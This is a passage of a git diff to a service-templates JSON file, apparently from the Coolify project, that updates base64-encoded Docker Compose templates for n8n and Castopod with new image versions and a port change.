ZFX1BZVEhPTl9SVU5ORVI6LXRydWV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgICAtIE9GRkxPQURfTUFOVUFMX0VYRUNVVElPTlNfVE9fV09SS0VSUz10cnVlCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgICAtICdOOE5fU0tJUF9BVVRIX09OX09BVVRIX0NBTExCQUNLPSR7TjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSzotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG44bi13b3JrZXI6CiAgICBpbWFnZTogJ244bmlvL244bjoyLjEwLjInCiAgICBjb21tYW5kOiB3b3JrZXIKICAgIGVudmlyb25tZW50OgogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotVVRDfScKICAgICAgLSAnVFo9JHtUWjotVVRDfScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSBOOE5fUlVOTkVSU19NT0RFPWV4dGVybmFsCiAgICAgIC0gJ044Tl9SVU5ORVJTX0JST0tFUl9MSVNURU5fQUREUkVTUz0ke044Tl9SVU5ORVJTX0JST0tFUl9MSVNURU5fQUREUkVTUzotMC4wLjAuMH0nCiAgICAgIC0gJ044Tl9SVU5ORVJTX0JST0tFUl9QT1JUPSR7TjhOX1JVTk5FUlNfQlJPS0VSX1BPUlQ6LTU2Nzl9JwogICAgICAtIE44Tl9SVU5ORVJTX0FVVEhfVE9LRU49JFNFUlZJQ0VfUEFTU1dPUkRfTjhOCiAgICAgIC0gJ044Tl9OQVRJVkVfUFlUSE9OX1JVTk5FUj0ke044Tl9OQVRJVkVfUFlUSE9OX1JVTk5FUjotdHJ1ZX0nCiAgICAgIC0gJ044Tl9SVU5ORVJTX01BWF9DT05DVVJSRU5DWT0ke044Tl9SVU5ORVJTX01BWF9DT05DVVJSRU5DWTotNX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgICAtICdOOE5fU0tJUF9BVVRIX09OX09BVVRIX0NBTExCQUNLPSR7TjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSzotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4L2hlYWx0aHonCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIG44bjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgcG9zdGdyZXNxbDoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNxbC1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXMtZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgdGFzay1ydW5uZXJzOgogICAgaW1hZ2U6ICduOG5pby9ydW5uZXJzOjIuMTAuMicKICAgIGVudmlyb25tZW50OgogICAgICAtICdOOE5fUlVOTkVSU19UQVNLX0JST0tFUl9VUkk9JHtOOE5fUlVOTkVSU19UQVNLX0JST0tFUl9VUkk6LWh0dHA6Ly9uOG4td29ya2VyOjU2Nzl9JwogICAgICAtIE44Tl9SVU5ORVJTX0FVVEhfVE9LRU49JFNFUlZJQ0VfUEFTU1dPUkRfTjhOCiAgICAgIC0gJ044Tl9SVU5ORVJTX0FVVE9fU0hVVERPV05fVElNRU9VVD0ke044Tl9SVU5ORVJTX0FVVE9fU0hVVERPV05fVElNRU9VVDotMTV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBuOG4KICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY4MC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
+        "compose": "c2VydmljZXM6CiAgbjhuOgogICAgaW1hZ2U6ICduOG5pby9uOG46Mi4xMC40JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9VUkxfTjhOXzU2NzgKICAgICAgLSAnTjhOX0VESVRPUl9CQVNFX1VSTD0ke1NFUlZJQ0VfVVJMX044Tn0nCiAgICAgIC0gJ1dFQkhPT0tfVVJMPSR7U0VSVklDRV9VUkxfTjhOfScKICAgICAgLSAnTjhOX0hPU1Q9JHtTRVJWSUNFX1VSTF9OOE59JwogICAgICAtICdOOE5fUFJPVE9DT0w9JHtOOE5fUFJPVE9DT0w6LWh0dHBzfScKICAgICAgLSAnR0VORVJJQ19USU1FWk9ORT0ke0dFTkVSSUNfVElNRVpPTkU6LVVUQ30nCiAgICAgIC0gJ1RaPSR7VFo6LVVUQ30nCiAgICAgIC0gREJfVFlQRT1wb3N0Z3Jlc2RiCiAgICAgIC0gJ0RCX1BPU1RHUkVTREJfREFUQUJBU0U9JHtQT1NUR1JFU19EQjotbjhufScKICAgICAgLSBEQl9QT1NUR1JFU0RCX0hPU1Q9cG9zdGdyZXNxbAogICAgICAtIERCX1BPU1RHUkVTREJfUE9SVD01NDMyCiAgICAgIC0gREJfUE9TVEdSRVNEQl9VU0VSPSRTRVJWSUNFX1VTRVJfUE9TVEdSRVMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1NDSEVNQT1wdWJsaWMKICAgICAgLSBEQl9QT1NUR1JFU0RCX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gRVhFQ1VUSU9OU19NT0RFPXF1ZXVlCiAgICAgIC0gUVVFVUVfQlVMTF9SRURJU19IT1NUPXJlZGlzCiAgICAgIC0gUVVFVUVfSEVBTFRIX0NIRUNLX0FDVElWRT10cnVlCiAgICAgIC0gJ044Tl9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfRU5DUllQVElPTn0nCiAgICAgIC0gTjhOX1JVTk5FUlNfRU5BQkxFRD10cnVlCiAgICAgIC0gTjhOX1JVTk5FUlNfTU9ERT1leHRlcm5hbAogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M9JHtOOE5fUlVOTkVSU19CUk9LRVJfTElTVEVOX0FERFJFU1M6LTAuMC4wLjB9JwogICAgICAtICdOOE5fUlVOTkVSU19CUk9LRVJfUE9SVD0ke044Tl9SVU5ORVJTX0JST0tFUl9QT1JUOi01Njc5fScKICAgICAgLSBOOE5fUlVOTkVSU19BVVRIX1RPS0VOPSRTRVJWSUNFX1BBU1NXT1JEX044TgogICAgICAtICdOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI9JHtOOE5fTkFUSVZFX1BZVEhPTl9SVU5ORVI6LXRydWV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgICAtIE9GRkxPQURfTUFOVUFMX0VYRUNVVElPTlNfVE9fV09SS0VSUz10cnVlCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgICAtICdOOE5fU0tJUF9BVVRIX09OX09BVVRIX0NBTExCQUNLPSR7TjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSzotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgZGVwZW5kc19vbjoKICAgICAgcG9zdGdyZXNxbDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4LycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAogIG44bi13b3JrZXI6CiAgICBpbWFnZTogJ244bmlvL244bjoyLjEwLjQnCiAgICBjb21tYW5kOiB3b3JrZXIKICAgIGVudmlyb25tZW50OgogICAgICAtICdHRU5FUklDX1RJTUVaT05FPSR7R0VORVJJQ19USU1FWk9ORTotVVRDfScKICAgICAgLSAnVFo9JHtUWjotVVRDfScKICAgICAgLSBEQl9UWVBFPXBvc3RncmVzZGIKICAgICAgLSAnREJfUE9TVEdSRVNEQl9EQVRBQkFTRT0ke1BPU1RHUkVTX0RCOi1uOG59JwogICAgICAtIERCX1BPU1RHUkVTREJfSE9TVD1wb3N0Z3Jlc3FsCiAgICAgIC0gREJfUE9TVEdSRVNEQl9QT1JUPTU0MzIKICAgICAgLSBEQl9QT1NUR1JFU0RCX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIERCX1BPU1RHUkVTREJfU0NIRU1BPXB1YmxpYwogICAgICAtIERCX1BPU1RHUkVTREJfUEFTU1dPUkQ9JFNFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVMKICAgICAgLSBFWEVDVVRJT05TX01PREU9cXVldWUKICAgICAgLSBRVUVVRV9CVUxMX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBRVUVVRV9IRUFMVEhfQ0hFQ0tfQUNUSVZFPXRydWUKICAgICAgLSAnTjhOX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9FTkNSWVBUSU9OfScKICAgICAgLSBOOE5fUlVOTkVSU19FTkFCTEVEPXRydWUKICAgICAgLSBOOE5fUlVOTkVSU19NT0RFPWV4dGVybmFsCiAgICAgIC0gJ044Tl9SVU5ORVJTX0JST0tFUl9MSVNURU5fQUREUkVTUz0ke044Tl9SVU5ORVJTX0JST0tFUl9MSVNURU5fQUREUkVTUzotMC4wLjAuMH0nCiAgICAgIC0gJ044Tl9SVU5ORVJTX0JST0tFUl9QT1JUPSR7TjhOX1JVTk5FUlNfQlJPS0VSX1BPUlQ6LTU2Nzl9JwogICAgICAtIE44Tl9SVU5ORVJTX0FVVEhfVE9LRU49JFNFUlZJQ0VfUEFTU1dPUkRfTjhOCiAgICAgIC0gJ044Tl9OQVRJVkVfUFlUSE9OX1JVTk5FUj0ke044Tl9OQVRJVkVfUFlUSE9OX1JVTk5FUjotdHJ1ZX0nCiAgICAgIC0gJ044Tl9SVU5ORVJTX01BWF9DT05DVVJSRU5DWT0ke044Tl9SVU5ORVJTX01BWF9DT05DVVJSRU5DWTotNX0nCiAgICAgIC0gJ044Tl9CTE9DS19FTlZfQUNDRVNTX0lOX05PREU9JHtOOE5fQkxPQ0tfRU5WX0FDQ0VTU19JTl9OT0RFOi10cnVlfScKICAgICAgLSAnTjhOX0dJVF9OT0RFX0RJU0FCTEVfQkFSRV9SRVBPUz0ke044Tl9HSVRfTk9ERV9ESVNBQkxFX0JBUkVfUkVQT1M6LXRydWV9JwogICAgICAtICdOOE5fRU5GT1JDRV9TRVRUSU5HU19GSUxFX1BFUk1JU1NJT05TPSR7TjhOX0VORk9SQ0VfU0VUVElOR1NfRklMRV9QRVJNSVNTSU9OUzotdHJ1ZX0nCiAgICAgIC0gJ044Tl9QUk9YWV9IT1BTPSR7TjhOX1BST1hZX0hPUFM6LTF9JwogICAgICAtICdOOE5fU0tJUF9BVVRIX09OX09BVVRIX0NBTExCQUNLPSR7TjhOX1NLSVBfQVVUSF9PTl9PQVVUSF9DQUxMQkFDSzotZmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnbjhuLWRhdGE6L2hvbWUvbm9kZS8ubjhuJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo1Njc4L2hlYWx0aHonCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIG44bjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICBwb3N0Z3Jlc3FsOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgcG9zdGdyZXNxbDoKICAgIGltYWdlOiAncG9zdGdyZXM6MTYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNxbC1kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFBPU1RHUkVTX1VTRVI9JFNFUlZJQ0VfVVNFUl9QT1NUR1JFUwogICAgICAtIFBPU1RHUkVTX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LW44bn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjYtYWxwaW5lJwogICAgdm9sdW1lczoKICAgICAgLSAncmVkaXMtZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSByZWRpcy1jbGkKICAgICAgICAtIHBpbmcKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDEwCiAgdGFzay1ydW5uZXJzOgogICAgaW1hZ2U6ICduOG5pby9ydW5uZXJzOjIuMTAuNCcKICAgIGVudmlyb25tZW50OgogICAgICAtICdOOE5fUlVOTkVSU19UQVNLX0JST0tFUl9VUkk9JHtOOE5fUlVOTkVSU19UQVNLX0JST0tFUl9VUkk6LWh0dHA6Ly9uOG4td29ya2VyOjU2Nzl9JwogICAgICAtIE44Tl9SVU5ORVJTX0FVVEhfVE9LRU49JFNFUlZJQ0VfUEFTU1dPUkRfTjhOCiAgICAgIC0gJ044Tl9SVU5ORVJTX0FVVE9fU0hVVERPV05fVElNRU9VVD0ke044Tl9SVU5ORVJTX0FVVE9fU0hVVERPV05fVElNRU9VVDotMTV9JwogICAgICAtICdOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k9JHtOOE5fUlVOTkVSU19NQVhfQ09OQ1VSUkVOQ1k6LTV9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSBuOG4KICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnd2dldCAtcU8tIGh0dHA6Ly8xMjcuMC4wLjE6NTY4MC8nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK",
         "tags": [
             "n8n",
             "workflow",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 5307b2259..49f1f126f 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -489,7 +489,7 @@
     "castopod": {
         "documentation": "https://docs.castopod.org/main/en/?utm_source=coolify.io",
         "slogan": "Castopod is a free & open-source hosting platform made for podcasters who want engage and interact with their audience.",
-        "compose": "c2VydmljZXM6CiAgY2FzdG9wb2Q6CiAgICBpbWFnZTogJ2Nhc3RvcG9kL2Nhc3RvcG9kOmxhdGVzdCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLW1lZGlhOi92YXIvd3d3L2Nhc3RvcG9kL3B1YmxpYy9tZWRpYScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9DQVNUT1BPRF84MDAwCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9Y2FzdG9wb2QKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtICdDUF9ESVNBQkxFX0hUVFBTPSR7Q1BfRElTQUJMRV9IVFRQUzotMX0nCiAgICAgIC0gQ1BfQkFTRVVSTD0kU0VSVklDRV9GUUROX0NBU1RPUE9ECiAgICAgIC0gQ1BfQU5BTFlUSUNTX1NBTFQ9JFNFUlZJQ0VfUkVBTEJBU0U2NF82NF9TQUxUCiAgICAgIC0gQ1BfQ0FDSEVfSEFORExFUj1yZWRpcwogICAgICAtIENQX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBDUF9SRURJU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgwMDAvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBtYXJpYWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS4yJwogICAgdm9sdW1lczoKICAgICAgLSAnY2FzdG9wb2QtZGI6L3Zhci9saWIvbXlzcWwnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBNWVNRTF9ST09UX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9Y2FzdG9wb2QKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjcuMi1hbHBpbmUnCiAgICBjb21tYW5kOiAnLS1yZXF1aXJlcGFzcyAkU0VSVklDRV9QQVNTV09SRF9SRURJUycKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLWNhY2hlOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdyZWRpcy1jbGkgLWEgJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMgcGluZyB8IGdyZXAgUE9ORycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHRpbWVvdXQ6IDIwcwogICAgICByZXRyaWVzOiAxMAo=",
+        "compose": "c2VydmljZXM6CiAgY2FzdG9wb2Q6CiAgICBpbWFnZTogJ2Nhc3RvcG9kL2Nhc3RvcG9kOjEuMTUuNCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLW1lZGlhOi92YXIvd3d3L2Nhc3RvcG9kL3B1YmxpYy9tZWRpYScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9DQVNUT1BPRF84MDgwCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9Y2FzdG9wb2QKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgICAtICdDUF9ESVNBQkxFX0hUVFBTPSR7Q1BfRElTQUJMRV9IVFRQUzotMX0nCiAgICAgIC0gQ1BfQkFTRVVSTD0kU0VSVklDRV9GUUROX0NBU1RPUE9ECiAgICAgIC0gQ1BfQU5BTFlUSUNTX1NBTFQ9JFNFUlZJQ0VfUkVBTEJBU0U2NF82NF9TQUxUCiAgICAgIC0gQ1BfQ0FDSEVfSEFORExFUj1yZWRpcwogICAgICAtIENQX1JFRElTX0hPU1Q9cmVkaXMKICAgICAgLSBDUF9SRURJU19QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9SRURJUwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgwODAvaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgICBkZXBlbmRzX29uOgogICAgICBtYXJpYWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHJlZGlzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMS4yJwogICAgdm9sdW1lczoKICAgICAgLSAnY2FzdG9wb2QtZGI6L3Zhci9saWIvbXlzcWwnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBNWVNRTF9ST09UX1BBU1NXT1JEPSRTRVJWSUNFX1BBU1NXT1JEX01ZU1FMCiAgICAgIC0gTVlTUUxfREFUQUJBU0U9Y2FzdG9wb2QKICAgICAgLSBNWVNRTF9VU0VSPSRTRVJWSUNFX1VTRVJfTVlTUUwKICAgICAgLSBNWVNRTF9QQVNTV09SRD0kU0VSVklDRV9QQVNTV09SRF9NWVNRTAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGhlYWx0aGNoZWNrLnNoCiAgICAgICAgLSAnLS1jb25uZWN0JwogICAgICAgIC0gJy0taW5ub2RiX2luaXRpYWxpemVkJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCiAgcmVkaXM6CiAgICBpbWFnZTogJ3JlZGlzOjcuMi1hbHBpbmUnCiAgICBjb21tYW5kOiAnLS1yZXF1aXJlcGFzcyAkU0VSVklDRV9QQVNTV09SRF9SRURJUycKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2Nhc3RvcG9kLWNhY2hlOi9kYXRhJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdyZWRpcy1jbGkgLWEgJFNFUlZJQ0VfUEFTU1dPUkRfUkVESVMgcGluZyB8IGdyZXAgUE9ORycKICAgICAgaW50ZX